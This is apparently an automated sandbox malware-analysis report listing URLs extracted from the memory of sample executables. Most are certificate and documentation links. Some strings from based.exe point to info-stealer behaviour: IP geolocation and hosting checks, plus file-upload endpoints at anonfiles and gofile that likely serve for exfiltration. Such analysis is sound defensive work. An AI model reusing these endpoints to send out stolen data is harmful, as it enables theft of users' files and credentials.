Source: hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: based.exe, 00000006.00000003.1726048221.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752876018.00000273ED015000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1749896560.00000273ED01B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1745966741.00000273ED02B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://json.org
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736420193.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736836575.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726792285.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727350063.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1728583386.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726405149.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736559335.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726220774.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1735413728.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726048221.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: based.exe, 00000008.00000003.1753993526.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: based.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadrU
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr;
